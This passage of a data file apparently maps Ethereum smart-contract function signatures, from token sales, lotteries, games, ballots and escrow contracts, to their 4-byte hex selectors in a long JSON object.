"0xacc5a0dc", "Draw()": "0xd4e78272", "PrepareDraw()": "0xd224118f", "BuyTickets()": "0x91d8b14e", "aEthereumlotteryNet()": "0xcee6ee38", "Prizes()": "0x24c9bf5e", "Details()": "0xb47d89ad", "changeIPFSHash(string)": "0xffcce369", "changeStatus(string)": "0x86a5ff97", "prenup(string,string,string,string,string,address,address)": "0xf3c7d275", "prepareRoll(uint256,uint256)": "0xf00acc47", "getDifficulty(uint256)": "0x983ef725", "BasicIncome_CoFund()": "0x79baa8a9", "profitsFromBitnationDebitCard()": "0x932db761", "reFund()": "0x0ff0a4df", "newInvest(uint256,address,uint256)": "0xfee35ff8", "CancelMyInvest()": "0x1d2dbb22", "GetMyInvestFee()": "0x1ceea715", "Investors(uint256)": "0xfbae5e7d", "forceMove(address,address,uint256)": "0xf5c8d71b", "moveFunds(address,uint256)": "0x3e476053", "resetWithdrawls()": "0xa4699cad", "soloWithdraw(uint256)": "0x12d00c2e", "changeDailyWithdrawalLimit(uint256)": "0x6389654e", "Foundation()": "0xbc9147a4", "getLength(string)": "0x6981b5f4", "getHistory(string,uint256)": "0xd052fbf6", "cash_received(string)": "0x13b2663b", "cash_transfered(string)": "0x96ef7aa0", "share_transfered(string)": "0x64265b1a", "order_received(string)": "0x1d8b70da", "addOrder(string,bool)": "0xe3280126", "getOrder(string)": "0x712ca0f8", "OrderLifeCycle()": "0xdd67a360", "getNavLength()": "0x9287c877", "getNavHistory(uint256)": "0x7cef6047", "getLength()": "0xbe1c766b", "getHistory(uint256)": "0xc8691b2a", "setNav(uint32)": "0xcdb6753b", "LedgerFund(uint32,uint32,uint64,uint64)": "0xc494f71a", "dEthereumlotteryNet()": "0xf99fc046", "getFirstActiveDuel()": "0xd499555b", "updateFirstActiveGamble(uint256)": "0xe1376da2", "dEthereumlotteryNet(address,address)": "0xc6ae3b57", "setContractAddress(address)": "0x477bddaa", "dEthereumlotteryNetWinners(address)": "0xe3914699", "getCount()": "0xa87d942c", "Add(uint256,string,string)": "0xfc1f2a70", "Fucksign()": "0x84dac46e", "UpdateContractorAddress(address)": "0xa36c8ec2", "UpdateClientTokenAccount(address)": "0x64e24f4b", "UpdateClientAddress(address)": "0xf765088f", "ContractorInterface(address,address,address)": "0xa0f029fc", "dEthereumlotteryNet(address,address,address)": "0x17db59a4", "rand(uint256)": "0x2530c905", "cashOut()": "0x793cd71e", "playToWinTest(uint256)": "0x6a9d2afd", "playToWin(uint256)": "0x478ae93c", "SkillBeatsLuck()": "0x63bfe3d8", "foo()": "0xc2985578", "admin_kill()": "0x76da5667", "challenge()": "0xd2ef7398", "PRNG_Challenge()": "0x26745909", "Contract(uint256,string,uint8,string)": "0x8a323b38", "receiveApproval(address,uint256,address,bytes)": "0x8f4ffcb1", "minority()": "0x72c7c85a", "Payout()": "0x354d7e40", "bet(uint8)": "0xd0821b0e", "BetOnBlue()": "0x29d6f899", "BetOnRed()": "0x5d5bc4cb", "HumanStandardToken(uint256,string,uint8,string)": "0xe5dd90a5", "getEventName()": "0xb81e43fc", "getOrganizer()": "0xc2def3b9", "getCertificateHash(bytes)": "0xbb3b8dca", "setPdfHash(bytes,bytes)": "0x89eedf00", "createCertificate(bytes)": "0xd1f7a4e4", "ConferenceCertification()": "0xea4af029", "ChangeContractor(address)": "0x9462eae5", "ChangeClientTokenAccount(address,bool)": "0x9ae4e388", "ChangeClient(address)": "0xb7538f3e", "ApproveContractorProposal()": "0x3e0d4f4a", "setContractorProposal(uint256,bytes)": "0x8b863095", "getTokenDivisor()": "0x00faf4dd", "getTokenAccount()": "0x270cfee1", "getTotalPayments()": "0x708f29a6", "getDateOfLastPayment()": "0x938199a5", "getDateOfFirstPayment()": "0xd02a9889", "getHashOfTheSignedDocument()": "0x0380e2f3", "getProposalCost()": "0xdabc706e", "ContractInterface(address,address,address)": "0x924c28c1", "Escrow(address,address)": "0x3059ac30", "collect()": "0xe5225381", "CrowdFund(uint256,uint256)": "0x3ccb7dc9", "Token()": "0xc2412676", "approveAndCall(address,uint256,bytes)": "0xcae9ca51", "Pluton(uint256,string,uint8,string)": "0xe5a27038", "getInvestorByAddress(address)": "0x3e0dfbdf", "setGlobalTokenTransferLock(bool)": "0x74398d45", "LockableToken()": "0xd56efabf", "TBCoin()": "0xfc79c8eb", "changeTBrate(uint256)": "0x4611efde", "getbackTB(uint256)": "0x4fa4a531", "TBsell()": "0x98faf5d1", "RECHToken()": "0xf5da16e9", "withdrawBalanceCut(uint256)": "0x04e98568", "PetCore()": "0xf55b39a3", "createGen0Auction(uint256,uint256,uint256,uint256,uint256)": "0x2afcdfbc", "createPromoPet(uint256,address,uint256,uint256,uint256,uint256)": "0x6a8ba0fa", "_createPet(uint256,uint256,address,uint256,uint256,uint256,uint256)": "0x492fea53", "Control()": "0x151bc167", "ARMOR()": "0x97c6e24d", "findTargetCell(uint256,uint256)": "0x78761590", "setExtraConfig(uint256,uint256)": "0x354e1063", "setConfig(uint256,uint256,uint256,uint256,uint256,uint256)": "0x33835161", "BitcoinPower()": "0xfa292c44", "ICOopen()": "0x01afebac", "getExchangeRate(address)": "0xefb7601d", "setStartRefund(bool)": "0x0a799557", "setEarlyInvestorExchangeRate(uint256)": "0x54cf6668", "addInitialInvestor(address)": "0x30e6d8d3", "setTransfer(bool)": "0xa296b323", "setICORunning(bool)": "0xcc234ee1", "TimeLeftBeforeCrowdsale()": "0x8aef91f5", "isInitialInvestor(address)": "0xc1e99a0e", "EtherBalanceOf(address)": "0x14c0bc27", "getAmountofTotalParticipants()": "0xdc132be8", "BlocklancerToken()": "0x21beedf4", "emitMint(address,uint256)": "0x3b57fdff", "create(string,string,uint8,address,uint256)": "0xe4bd6695", "ERC223StandardTokenFactory(address)": "0x5003c81d", "ERC223StandardToken(string,string,uint8,address,uint256)": "0x41e7a787", "removeAddressToWhitelist(address)": "0x759c676d", "Rookcont()": "0x0dd2d9c0", "Josephtoken()": "0x6ff28657", "setTransferLock(bool)": "0xbff35618", "Jokercoin()": "0x26b93939", "getCurrentRate(uint256)": "0xb88a529b", "SmokeExchangeCoinCrowdsale(uint256,uint256,address,uint256,uint256,uint256,address)": "0xd72c83c0", "SmokeExchangeCoin(uint256,address,address,uint256,uint256,uint256)": "0xd0bf4d95", "End_Promotion()": "0xbb6d0132", "TransferTRAC()": "0x1c22b196", "CheckRefundIsFair()": "0x59915fd3", "seeRaised()": "0x9c066eab", "Refund_user()": "0x4cdfc605", "Claim_TRAC_900()": "0xbe46203e", "Claim_TRAC_1850()": "0x49adf14f", "Claim_TRAC_3800()": "0xcbc9c89c", "Claim_TRAC_9600()": "0xd3146a46", "Claim_TRAC_20000()": "0x4e94917a", "Oxygen()": "0xb63426b3", "shouldHadBalance(address)": "0xd9a4ad8b", "isRole(address)": "0x7beeb945", "assign(uint16,address,uint256)": "0x039b6c34", "setRule(uint16,uint256,uint256,uint256,uint256)": "0xefff78a5", "BPToken()": "0x935d29d6", "changelp20(address)": "0x8ac1f290", "changelp19(address)": "0xbf83735c", "changelp18(address)": "0xdd3d0bee", "changelp17(address)": "0xfe37f21a", "changelp16(address)": "0x4ae34a96", "changelp15(address)": "0x38d40ced", "changelp14(address)": "0x66341c97", "changelp13(address)": "0x50b066b2", "changelp12(address)": "0x9b02e258", "changelp11(address)": "0x91656aa9", "changelp10(address)": "0x54d05ad2", "changelp9(address)": "0x759e6558", "changelp8(address)": "0x8f039a10", "changelp7(address)": "0xceef3d93", "changelp6(address)": "0x6dfc15a4", "changelp5(address)": "0xe17463c2", "changelp4(address)": "0xc43d56bb", "changelp3(address)": "0x921193cf", "changelp2(address)": "0x03f67e1b", "changelp1(address)": "0xcd906676", "changejp2(address)": "0xe054c029", "changejp1(address)": "0x540273bb", "changedp1(address)": "0x3d6e38b8", "changesp2(address)": "0xe7b7aea5", "changesp1(address)": "0xa00dc9dd", "changemp(address)": "0x90bf0301", "changegp(address)": "0x05c3cb8d", "SFTPRECOE()": "0x9073280b", "transferFee(uint256)": "0xd4203561", "setPricingPlan(address)": "0x45fc916c", "setTransferFeePercentage(uint256)": "0x83b58323", "isCustomToken()": "0xe6f1a189", "NokuCustomERC20(string,string,uint8,address,address)": "0xccdb05d4", "enableBuyBackMode(address)": "0xcf88eebe", "setLockup_investors(address,uint256,uint256)": "0xf937a6eb", "setLockup_contributors(address,uint256,uint256)": "0xff96b467", "getLockedAmount_investors(address)": "0x96bc1a89", "getLockedAmount_contributors(address)": "0x17597b0f", "BOXToken()": "0xbf538b68", "endPreSale()": "0xee889ed0", "MASSTokenPreSale(address,uint256,uint256)": "0x8b128249", "addint256(int256,int256)": "0x0ab9419d", "numActiveGames()": "0xd475526f", "numEndedGames()": "0x35796635", "startDefinedGameManually(uint256)": "0x803435d7", "_error(string)": "0x89d8b472", "enableDefinedGame(uint256,bool,bool)": "0x108d0c84", "editDefinedGame(uint256,string,uint256,uint256,int256,uint256,uint256)": "0xb3bc5b10", "getMonarchyFactory()": "0xcdb23c2d", "getCollector()": "0x50228201", "lastCreatedGame()": "0x0befeeb0", "POPKOIN()": "0x3d7a8c0e", "setMinBalance(uint32)": "0x5a04ce5b", "sell(uint32)": "0x4ffd23a7", "setPrices(uint32,uint32)": "0x55a6b827", "disableFundingWallets(address,address)": "0x5a34ced1", "lock(address,uint256,uint256)": "0xe2ab691d", "SmartToken()": "0x66adeb3a", "fundingEnabled()": "0xe10e95c9", "totalProjectToken()": "0x54d18864", "totalSoldTokens()": "0xd7ca9949", "initialSupply()": "0x378dc3dc", "HodboCrowdsale()": "0xfbff728f", "GenesisManager(address,address,address,address,uint256)": "0x62465f0a", "DIGI()": "0x8577efc5", "OriginsTraceChainToken(address)": "0x6935a290", "ZYL()": "0x2e2fe8a9", "_AtlantisToken()": "0xc6388e6f", "withdrawBalances()": "0x6ccbb0ab", "bidOnBreedingAuctionTutorial(uint40)": "0x1bbfce0e", "_breedWith(uint40,uint40)": "0x3348cad7", "breedWith(uint40,uint40)": "0xc30bc5ef", "_canMateViaMarketplace(uint40,uint40)": "0x9a6d7cb8", "canBreedWith(uint40,uint40)": "0xd997933f", "canBreed(uint40)": "0x05910b91", "approveBreeding(address,uint40)": "0xfb43b2a2", "setGeneMixerAddress(address,address)": "0x8b1097c1", "_isBreedingPermitted(uint40,uint40)": "0x1dc0819e", "createSaleAuction(uint40,uint128,uint128,uint40)": "0x50bc6bba", "bidOnBreedingAuction(uint40,uint40)": "0xf3cb1805", "setMarketAddress(address,address)": "0x430c73c5", "createBreedingAuction(uint40,uint128,uint128,uint40)": "0x78a6c6d2", "createPromoCutie(uint256,address)": "0x210fcbf6", "createGen0Auction(uint256,uint128,uint128,uint40)": "0x9de8302f", "migrate2(address,uint40,uint40,address,address)": "0x839daf1d", "setUpgradedAddress(address)": "0x5f24f6fe", "BlockchainCutiesCore()": "0x8968c17c", "setMinSign(uint40)": "0x40a92f0f", "runPluginSigned(address,uint40,uint40,uint128,uint256,uint8,bytes32,bytes32)": "0x9ad73f20", "isValidSignature(address,uint40,uint40,uint128,uint256,uint8,bytes32,bytes32)": "0x45c7a092", "getSigner(address,uint40,uint40,uint128,uint256,uint8,bytes32,bytes32)": "0x94e50e7a", "hashArguments(address,uint40,uint40,uint128,uint256)": "0xbdad8112", "runPlugin(address,uint40,uint256)": "0x887e0c07", "removePlugin(address,address)": "0xbd8cb6ca", "addPlugin(address,address)": "0x69623ae2", "setMetadataUrl(string,string)": "0x79edfa7d", "restoreCutieToAddress(uint40,address)": "0xa86ee746", "_transfer(address,address,uint40)": "0x8bf87123", "_createCutie(uint40,uint40,uint16,uint16,uint256,address,uint40)": "0x550c99c6", "_isApprovedForAll(address,address)": "0x2d95fdb5", "_approve(uint40,address)": "0x14d2d59d", "_approvedFor(address,uint40)": "0x694f6276", "canBreed(uint40,uint256,uint40,uint256)": "0xc868a569", "isGeneMixer()": "0x90da7c3c", "UpgradeRig(uint8,uint16)": "0xb4b9cd62", "setSmsCertificationRequired(bool)": "0x70eb6424", "updateIpfsGateway(string)": "0x790587d1", "getRemainingTokenForArticle(string)": "0xbb94392e", "hasReadership(address,uint256)": "0x23f7dc66", "claimReadership(uint256,string)": "0x42e11316", "publish(string,bytes32,uint256)": "0xf2dd4be8", "ProofOfReadToken(uint256,uint256,string,uint8,string)": "0x95d697c4", "getAuctions(uint32,uint32)": "0xa9393452", "getAuctionsById(uint32[])": "0xda3e0fd1", "averageMinerSalePrice()": "0x9b311b17", "setRitualFee(uint256)": "0x43ea0313", "finishRitual(address)": "0x775f5ec0", "startRitual()": "0xeadb6e84", "burnWarrior(uint256)": "0x09fc3c53", "recoverSouls(address[],uint256[],uint256[])": "0x5071fcf0", "WarriorSanctuary(address,uint32[])": "0x5549ce5e", "_generateIdentity(uint256,uint256,uint256,uint256)": "0x4f932d44", "changeParameter(uint32,uint32)": "0xda9ad094", "BattleProvider(address,uint256,uint256,uint256,uint256,uint256)": "0xd24d11ad", "removeAllTournamentContenders()": "0x6f6f828e", "finishTournament()": "0x6b2bb92a", "_triggerFinishTournament()": "0xc33db789", "_grandTournamentBooty(uint256,uint256,uint256,uint256)": "0xf3aa4420", "_computeTournamentBooty(uint256,uint256,uint256)": "0xce629a6b", "getTournamentState()": "0x74af3ee1", "getCombinedWarriors()": "0x74a0cd8c", "canFinishTournament()": "0x46682cab", "maxTournamentContenders()": "0xc6169e1f", "getTournamentEntranceFee()": "0x8db7cd54", "setTournamentEntranceFeeCut(uint256)": "0x59bb7867", "_computeTournamentBeneficiaryFee(uint256)": "0xf5dd7650", "_computeTournamentContenderCut(uint256)": "0xdc154918", "_computeTournamentIncentiveReward(uint256,uint256)": "0x31391828", "Tournament(uint256,uint256,uint256,uint256,uint256)": "0x4eb37fe7", "removeAllPVPContenders()": "0x059d45da", "getPVPCycles(uint32[])": "0xfe1b602a", "removePVPContender(uint256)": "0xa72f3dea", "committ_payment(uint256,uint256)": "0x9b7c5517", "cancel_payment(uint256)": "0x570fe8c3", "notify_payment_acceptance_request(uint256)": "0x9bff662c", "submit_payment(uint256,uint256,bytes32,bytes32,uint256,address,bytes32)": "0xceac2aed", "set_payments_processor(address)": "0xb2910826", "resume()": "0x046f7da2", "pause_for_maintenance()": "0x89c766fd", "unblockAccount(uint256)": "0x8d80c34e", "blockAccount(uint256)": "0x429f3b48", "setOverdraft(uint256,uint256)": "0xb23bc656", "removeFunds(uint256,uint256,uint256,uint256)": "0x126fbb3a", "addFunds(uint256,uint256)": "0x85f45250", "setFees(uint256,uint256)": "0x0b78f9c0", "setBankName(bytes32)": "0x83dd7aa4", "redeemFunds(uint256,uint256,uint256,bytes32)": "0xb3ff1112", "makeTransfer(uint256,uint256,uint256,bytes32)": "0x573d3a23", "openAccount()": "0x292eb75d", "cryptobank(bytes32,bytes32)": "0xd1b31a63", "EthSplit(address[],address)": "0xd7dccb1e", "setChild(address,bytes32,bytes32,bool)": "0x9506a75c", "setMember(address,bytes32,address,bool)": "0x83565503", "liquidateFund()": "0xa266f4da", "checkProposalCode(uint256,address,uint256,uint256,bytes)": "0xc04123fb", "voteProposal(uint256,bool)": "0xbcfb9b61", "addProposal(address,uint256,uint256,string,uint256,bytes)": "0xa68b51ed", "launchFund(uint256)": "0xc9c1db4a", "contributeFund(string)": "0x45b26383", "removeMember(uint256)": "0xa1a74aae", "addMember(address,string,uint256)": "0x1b760719", "Daio(uint256)": "0x65d0a890", "getBillOwner()": "0xb158b63f", "getContractStatus()": "0xc032846b", "transferBill(address)": "0x470e872c", "createBill(address)": "0x333885a0", "initSale(address,address,uint256,string)": "0xa9856d6d", "Shipia()": "0xa733800d", "preBuy(address,uint256,bool)": "0x5cbfdd8d", "appendTranch(uint256,uint256)": "0x45083f73", "preDistribute(address,uint256)": "0xa72f5aaa", "setPresale(address,bool)": "0xee2089b2", "TwoStageSale(bytes32,uint256,uint256,uint256,uint256,uint256,uint256,uint256,address,uint256,uint256,uint256)": "0x546434e3", "buy(uint256,address,uint256,bool)": "0xc1d55af8", "postpone(uint256)": "0xc048dfb8", "StandardSale(bytes32,uint256,uint256,uint256,uint256,uint256,uint256,uint256,address)": "0x63175913", "YBananaCoin()": "0xc1082c00", "setAddress(string,address,bool)": "0x1870ad14", "mul0()": "0x1f8ac604", "testingContracts2(string)": "0x6c4f5e51", "setId(uint256)": "0xd0e0ba95", "metaCoin()": "0x4e3b52fe", "ContractCallerProxy(address)": "0x1c2e2796", "TwoPhaseTransfers(address[],address[])": "0x99c32025", "setBalanceOfValueFor(address,uint256)": "0xf40ebcf3", "getTransferValueFor(address)": "0xd8bbae03", "resetTransferToValues()": "0xe96fefec", "resetBalanceOfValues()": "0xb2849055", "getTransferValueValue()": "0xf88e0b09", "getTransferToValue()": "0x6be99794", "setBalanceOf(uint256)": "0x28ce213e", "SimpleToken(string,string,uint256,uint256)": "0x138495de", "canPerform(address,bytes4)": "0x9dd9c24b", "registerStudent(address)": "0xc7573e82", "getStudentCount()": "0x41e0c407", "Course(string,string,uint256)": "0x84a438de", "create(uint256,address,string,string)": "0x6718484f", "PublicBallot(address,string,string)": "0xd9f1a1a9", "stopBallot()": "0x1719d726", "startBallot()": "0x452ddecc", "castVote(uint256)": "0x3eb76b9c", "addProposal(string,string,string,address)": "0x9ae65eea", "BasicBallot(address,string,string)": "0xf1ffde45", "delegateTo(address)": "0xac637c7a", "Ballot(string,bytes32[])": "0xe3669d7c", "safetyCheck(uint256)": "0x5aed4fa0", "setNewTokenAddress(address)": "0x2cf033a0", "MigrationAgent(address)": "0x175a8bf4", "finalizeMigration()": "0xb78b6087", "JtoA(uint256[3])": "0x04bf1ee2", "ecmul(uint256[3],uint256)": "0x1fb156ef", "ecdouble(uint256[3])": "0x6ddf12ae", "ecadd(uint256[3],uint256[3])": "0x1ba22084", "isPoint(int256,uint256,uint256)": "0x42d596e0", "ecdsaverify(uint256,uint256,uint256,uint256,uint256)": "0xd2689abc", "testsignature()": "0x8b4fac8e", "PrivateSale()": "0x2b146407", "addAction(uint256,string,string,uint256,bytes32,uint256)": "0x9137b6e6", "getAction(uint256)": "0xb6e76873", "BasicIterator()": "0xdf776689", "TemperatureMeasurementA2(address,int8,int8,uint16,string)": "0x0d75f659", "isTransferAllowed()": "0xcd8c063b", "addToAllocation(uint256)": "0x98c20c00", "retrieveUnsoldTokens()": "0x74151a2a", "releaseAdvisorTokens()": "0x1367641e", "releaseEnjinTeamTokens()": "0xccdd95d6", "ENJToken(address,address,address,address)": "0x35ed663d", "confirmVerbose(bytes32,address,uint256,bytes)": "0x886588ac", "confirmed(bytes32)": "0xdbfe791b", "listProperty()": "0x1c68fe82", "getProperty(bytes32)": "0x463f7a89", "removeProperty(bytes32)": "0x89523d77", "lockBalance(address,uint256)": "0x7837e170", "setRelay(address)": "0xc805f68b", "Ethbet(address,address)": "0x0f145dca", "changeBoardAddress(address)": "0xab6a5d95", "TruReputationToken()": "0x33bc6283", "TruUpgradeableToken(address)": "0xd814ebed", "finishMinting(bool,bool)": "0xe6d30bf2", "addressLength(address,address)": "0xf5037b2a", "toString(address)": "0x56ca623e", "isValid(address)": "0x8b1b925f", "getVendorName(address)": "0xfe1b6f8f", "setVendorName(address,bytes32)": "0x69580f63", "isVendor(address)": "0xee54d54f", "VendorRegistry(address)": "0x6af6e64a", "functionName()": "0xd7d15059", "forward_transaction(address,uint256,bytes)": "0x9f0b17e3", "OwnedProxy(address)": "0x431dc892", "SimpleStorage()": "0x027b1fb3", "DDJETHToken()": "0xe3877391", "close(address,address,uint8,uint256)": "0xfd669810", "getChannelId(address,address,uint8)": "0xcc20d075", "generateKeccak256(bytes)": "0xf459eb61", "generateBalanceHash(address,uint8,uint256)": "0xf568006f", "getSignerOfBalanceHash(address,uint8,uint256,bytes)": "0xf3e68264", "getChannelInfo(address,address,uint8)": "0x6f204f20", "closeChannel(address,uint8)": "0x084992a6", "cooperativeClose(address,uint8,uint256,bytes,bytes)": "0x523898f4", "uncooperativeClose(address,uint8,uint256)": "0x3cc7508f", "openChannel(address,uint256,uint8)": "0xf5eeaea3", "LifChannels(address,uint256)": "0xaab065e8", "grantGrantableAllocations()": "0xfd0a7f3e", "getGranteesSize()": "0x2faef4e5", "getGrantees()": "0x5c7f7f63", "addGrantableAllocation(address,uint256,bool)": "0xfb950a7f", "grantAllocation(address,uint256,bool)": "0x95c8d4ee", "raiseDispute()": "0x6daa2d44", "setPartyB(address)": "0x4d47ae8c", "setPartyA(address)": "0xab624cf1", "setArbitrator1and2(address,address)": "0x62c47064", "setArbitrator0(address)": "0x7a3e0013", "attack(uint256,uint256)": "0xe1fa7638", "randMod(uint256)": "0x805553e8", "nowCanProvideHash()": "0x9da0c7b1", "getCurrentNeedsCount()": "0xe455d26c", "sendSeedAndHash(bytes32,bytes32)": "0xa0d1de29", "sendOnlyHash(bytes32)": "0xdd2407d3", "requestOneUUID(address,uint256)": "0x237a4a7f", "setFees(uint256)": "0x3d18678e", "collectFees(uint256,address)": "0x51f3b4bd", "setUserDisplayName(string)": "0xb2758411", "insert(address,string)": "0x16181a48", "WallDirectory()": "0x234ae1a0", "totalSupplyAtTime(uint256)": "0xd2dcd933", "balanceOfAtTime(address,uint256)": "0x3037408d", "balanceOfAtType(address,uint256,uint256)": "0xba087b9d", "genesisTransfer(address,uint256)": "0x49e09da6", "hasTransfers(address)": "0x2303084b", "closest(uint256,uint256,address)": "0x707afb1d", "recordToTransfer(address,uint256,uint256)": "0x439d4265", "recordTransfer(address,address,uint256,uint256)": "0xfb64e072", "claimComputation(bytes,bytes32)": "0xd59167f6", "newPlayer()": "0x75479c34", "Collect()": "0xc1826d78", "Mine()": "0x42c8705b", "upgradeCrystalMine()": "0xbf6b43a1", "upgradeReactor()": "0xb91366b0", "removeAddressesFromWhitelist(address[])": "0x24953eaa", "addAddressesToWhitelist(address[])": "0xe2ec6ec3", "grantAccess(address,bool)": "0xfd7fe115", "newResolution(string,string)": "0xbf314640", "newOrder(address,uint256,uint256)": "0xbe4a6bad", "updateDescription(string,bytes32)": "0xb3c1ee88", "setProjectManager(address)": "0xe917b027", "cloneOrder(address,uint256,uint256,uint256)": "0x84e70093", "addOrder(address,uint256,uint256,uint256)": "0x980dc482", "numberOfResolutions()": "0x21c02472", "ProjectManager()": "0xad98ebaf", "numberOfOrders()": "0xb451794e", "vote(uint256,uint256)": "0xb384abef", "resolveProp(uint256)": "0xcb09abc2", "check(bytes20,uint24,uint32,bytes32[],uint16)": "0x8e5b2899", "enableTransfers()": "0xaf35c6c7", "addRoot(bytes32)": "0xd59e6461", "register(bytes20,uint24,uint32,bytes32[],uint16)": "0xed3411dc", "Registry(bytes32,uint16)": "0x44b11f26", "DetailedERC20(string,string,uint8)": "0xa6effaed", "topUp()": "0xdc29f1de", "EthStorageContract(address,address,address[],uint256,uint256,string,string,uint8)": "0xdb8f2f75", "chooseWinner()": "0xcd38aa87", "maybeNewRound()": "0x04a3c21f", "finalizeRound()": "0x1e820325", "enterLottery(uint32)": "0xb102f52b", "hasRoundEnded()": "0xfa0b6211", "getEntries()": "0x17be85c3", "LotterySymbol()": "0x0fbc0f82", "Electricity(string,string)": "0x4bd22521", "isMigrationAgent()": "0xdf4bcf58", "ICOParticipants(address)": "0xc9a0e252", "isTokenContract()": "0x50372085", "tweakUpgrading()": "0x5a6f7aef", "contractStartDate_()": "0x548b5e6b", "coinbaseWallet()": "0x0b8a7bf8", "icoPhaseAmount1()": "0x50bacea9", "networkDevelopmentSupply()": "0x07266117", "companyWallet()": "0x1ec32d15", "RESERVED_BUSINESS_GROUP()": "0xeae9dbec", "amountReserved()": "0xea0d8da4", "lastBlock_v19Hash_uint256()": "0x3cf679a5", "ICOweek1End()": "0x0cf93a60", "amountOfHolders()": "0xa74baaa4", "Hardcap()": "0xa657242b", "issuedBounty()": "0x0b5ca8db", "BASE_HARD_CAP_PER_ROUND()": "0xce14eeb8", "Menu09()": "0xd8460e8c", "pubsaleCap()": "0x647b5ced", "receivedETH()": "0x820bec9d", "thirdTeamWithdrawal()": "0x7908f25c", "ANNOUNCE_WINNER_DEADLINE()": "0x2b680932", "secondRate()": "0xe6a33268", "infoMessage()": "0x9c85a28a", "EstimatedICOBonusAmount()": "0x819ad6d6", "code()": "0x24c12bf6", "MAX_TIME_RANGE_COUNT()": "0xdb8bcec4", "releaseArr()": "0xab84db68", "earlybonus()": "0xef0dddba", "addressSCICO()": "0xec17a7a3", "totalChequeValue()": "0xa9b1ffd9", "saleIsRunning()": "0x20688582", "Y1_lockedTokenReleaseTime()": "0xa000812c", "minimumContributionPresalePhase2()": "0x7846c3c8", "deathData_f6()": "0xa081fc19", "defaultTreesOwner()": "0x53458f5e", "minBalanceToSell()": "0xd49dbb5c", "destroyCrowdsale()": "0x56442869", "lockoutPeriod()": "0xd40027ec", "neverdieSigner()": "0x21a19b2d", "totalPlayCount()": "0x59dfdec8", "teamWon()": "0x4b9a22af", "FREEZE_END()": "0xeb4c5593", "getStart()": "0xc5292c67", "coinPool()": "0xf4ea77f3", "upgraded()": "0xc28de2cd", "setAvailableToken()": "0x58883688", "concludeUFT()": "0x30c2927d", "RCD()": "0x49416e45", "market2019TokenCreated()": "0x680def61", "refundDeadline()": "0xe1aa1bcc", "commandGetBonusTime()": "0x11a1b31e", "weiLiquid()": "0xb196f378", "priorTokensSent()": "0x5c56afa3", "maxAmount()": "0x5f48f393", "billingAmount()": "0xb6d3faa3", "icoStartTimestamp()": "0xbf36dd16", "endPrivateSaleStage()": "0xad50dd1f", "mgmtRewardPercentage()": "0xcdd8d4e8", "votingDescription()": "0x809c5b9e", "PRE_SALE_3WEEK_BONUS()": "0x21a389cc", "WOLF4()": "0xc13ab0fe", "addrDevTeam()": "0x4493b8a4", "arawWallet()": "0x2cc5d662", "bltOwned()": "0xadb746dc", "bidoohAdminAddress()": "0x913fc67a", "preICOStartDate()": "0x824d1b4b", "changeTrueUSDOperation()": "0x6e359afa", "OPTION_POOL_ALLOC()": "0x793e9b0b", "ICOEndTime()": "0xa242f049", "CaDataContract()": "0x6432e3cd", "team1Address()": "0x4811c070", "PVT_INV_TOKENS()": "0xa5c5762b", "nextCommonTTMTokenId2()": "0xe39d2a98", "feeSharingBps()": "0xedafe588", "partnershipsTokenAddress()": "0xd7f56ef7", "card_gold_first()": "0x57988a55", "okamiCurrentPurchase_()": "0x64506302", "totalPlayerWinnings()": "0x2cca664b", "finalizedNextUpgrade()": "0x82e2f767", "blockDuelBegin()": "0xbd24de29", "TreeLim()": "0x3d96c758", "Luvtoken()": "0xd46b2987", "externalControllerCandidate()": "0x95d9a030", "NIMFA_PER_ETH_PRE_SALE()": "0x8cbbe25f", "auctionAddress()": "0x5476ea9e", "payDate()": "0x9b332a91", "generatedGze()": "0x6a5392d7", "beneficiary1()": "0x4f52ccfa", "CHARITY()": "0x3039e6f9", "REFERER_PERCENT()": "0xecc38a1f", "produceUnitSeconds()": "0xfd2b863d", "airdropDistributedTokensAmount()": "0x7342c484", "dividendsPoolAddress()": "0xf459f517", "MAX_FEE_PERCENTAGE()": "0x558e44d3", "ERA_PERIOD()": "0x0f6d9f00", "endDonations()": "0xe9433ab6", "reducer()": "0x65fddc81", "lastBuyTime()": "0xf29f4d0b", "icoETHContributionLimit()": "0x6cf7cff6", "RequestRefund()": "0x0ee33128", "emissionProvidersCount()": "0xbf5c7f9b", "AddrInvestor()": "0x36829419", "max_goal_amount()": "0xe3a70ec1", "mintTo()": "0x92123470", "checkPause()": "0xa0b9f0e1", "_sendtoken(address,address,uint256)": "0x803d65ff", "sendtoken(address,uint256,address,uint256,address,uint256,address,uint256,address,uint256,address,uint256)": "0x84658e2a", "fundtransfer()": "0xd874082a", "EASYLIFE(uint256,string,string)": "0x4e26c95e", "DamnRocks()": "0x520ce39e", "PoSToken()": "0xfc7cb268", "ALPToken()": "0xf13837f6", "completeContract(bool)": "0xeea0168a", "setDS(address)": "0xc2b06664", "setBubbled(address)": "0x44f39803", "setCSInterface(address)": "0x7c59cb3d", "setStorageInterface(address)": "0x3409952b", "setBLInterface(address)": "0x351e46de", "Interim()": "0xf8896ea6", "getUInt(bytes32)": "0x5aec6259", "goal()": "0x40193883", "setPrimaryAccount(address)": "0xc1699bf6", "changeWeiCostOfToken(uint256)": "0x7e947347", "crowdSaleApprove(address,uint256)": "0x406f1d22", "addOwed(address,uint256)": "0x0b2909e6", "openCrowdSale(uint256)": "0x2a292cce", "lockCrowdSale()": "0xbcf68f87", "lockSupply()": "0x81eaf99b", "getOwed(address,address)": "0x38536878", "acceptParityOwnership()": "0xdf000ff7", "transferParityOwnership(address)": "0x859da4e3", "IndorsePreSale()": "0x5d65432d", "CentaToken()": "0xaf463d2a", "getReferenceAddressesOfCode(bytes32)": "0xb2523b67", "getReferenceCodesOfAddress(address)": "0xc9f316dc", "sendTokens(address,uint256,uint256,bytes32)": "0x57381ee4", "setFSTPrice(uint256,uint256)": "0x98cfa44e", "setFunderSmartToken(address)": "0xde803198", "declareRF(string)": "0xf056a5c7", "fireLottery(uint8)": "0x7ed02cbe", "issueLottery(uint8)": "0x35a374dc", "setTimesEnabled(uint8,bool)": "0x5d208872", "setNotInWhitelistAllow(uint256)": "0x83084b3f", "setMinParticipants(uint256)": "0xec3d45e8", "setBaseTokenGetRate(uint256)": "0x06881fd1", "OSATOKEN()": "0x37a91776", "IDAP(address,address,address)": "0xadd94f25", "getVestingPeriodNumber()": "0x45fa4045", "burnTokensForSale()": "0x1b65144d", "isListing()": "0xe06ec0bb", "activateSaleContract(address)": "0xfdd080a4", "BitcoinBrand()": "0x2b223264", "CotteToken()": "0x0112e2c4", "erc20Buy(address,uint256,string,string)": "0xfaa5ca93", "getDepositTxMap(string)": "0x9d119a7b", "setErc20Rate(string,uint256)": "0x61ef8d91", "getErc20Rate(string)": 